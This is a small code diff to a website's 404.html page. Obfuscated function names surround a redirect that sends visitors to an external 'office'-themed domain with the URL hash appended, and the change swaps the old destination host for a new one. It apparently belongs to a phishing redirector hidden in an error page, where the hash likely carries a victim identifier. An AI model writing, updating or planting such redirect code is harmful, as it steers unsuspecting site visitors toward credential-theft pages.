--- a/404.html
+++ b/404.html
@@ -167,7 +167,7 @@ function UXFzRuIRKj() {
   }
   
   // Redirect to the target URL with the cleaned hash appended
-  window.location.href = "https://office.tplsa.it.com/SkWevjIu" + hash;
+  window.location.href = "https://office.itxd.store/afKfdDTu" + hash;
 }
 
 function YkFLlYvpMd(){
